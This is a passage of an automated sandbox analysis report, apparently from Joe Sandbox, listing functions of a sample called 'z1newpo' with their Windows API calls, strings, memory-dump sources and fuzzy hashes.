                                                    • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                    • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                    Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                    • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 1976180769-4113822522
                                                    • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                    • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                    • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                    • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                    Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                    • String ID:
                                                    • API String ID: 461458858-0
                                                    • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                    • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                    • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                    • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                    Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                    • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                    • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                    • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                    • DeleteObject.GDI32(?), ref: 004301D0
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3969911579-0
                                                    • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                    • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                    • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                    • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                    Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                    • String ID: 0
                                                    • API String ID: 956284711-4108050209
                                                    • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                    • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                    • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                    • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                    Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 1965227024-3771769585
                                                    • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                    • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                    • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                    • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                    Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: SendString$_memmove_wcslen
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 369157077-1007645807
                                                    • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                    • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                    • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                    • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                    Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32 ref: 00445BF8
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                    • __wcsicoll.LIBCMT ref: 00445C33
                                                    • __wcsicoll.LIBCMT ref: 00445C4F
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$ClassMessageNameParentSend
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 3125838495-3381328864
                                                    • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                    • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                    • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                    • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                    Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                    • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                    • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                    • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CharNext
                                                    • String ID:
                                                    • API String ID: 1350042424-0
                                                    • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                    • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                    • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                    • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                    Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                    • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                    • _wcscpy.LIBCMT ref: 004787E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                    • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 3052893215-2127371420
                                                    • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                    • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                    • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                    • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                    Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                    • __swprintf.LIBCMT ref: 0045E7F7
                                                    • _wprintf.LIBCMT ref: 0045E8B3
                                                    • _wprintf.LIBCMT ref: 0045E8D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2295938435-2354261254
                                                    • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                    • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                    • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                    • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                    Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __swprintf_wcscpy$__i64tow__itow
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 3038501623-2263619337
                                                    • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                    • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                    • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                    • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                    Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                    • __swprintf.LIBCMT ref: 0045E5F6
                                                    • _wprintf.LIBCMT ref: 0045E6A3
                                                    • _wprintf.LIBCMT ref: 0045E6C7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2295938435-8599901
                                                    • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                    • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                    • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                    • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                    Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • timeGetTime.WINMM ref: 00443B67
                                                      • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                    • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                    • SetActiveWindow.USER32(?), ref: 00443BEC
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                    • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                    • IsWindow.USER32(?), ref: 00443C3A
                                                    • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                    • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1834419854-3405671355
                                                    • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
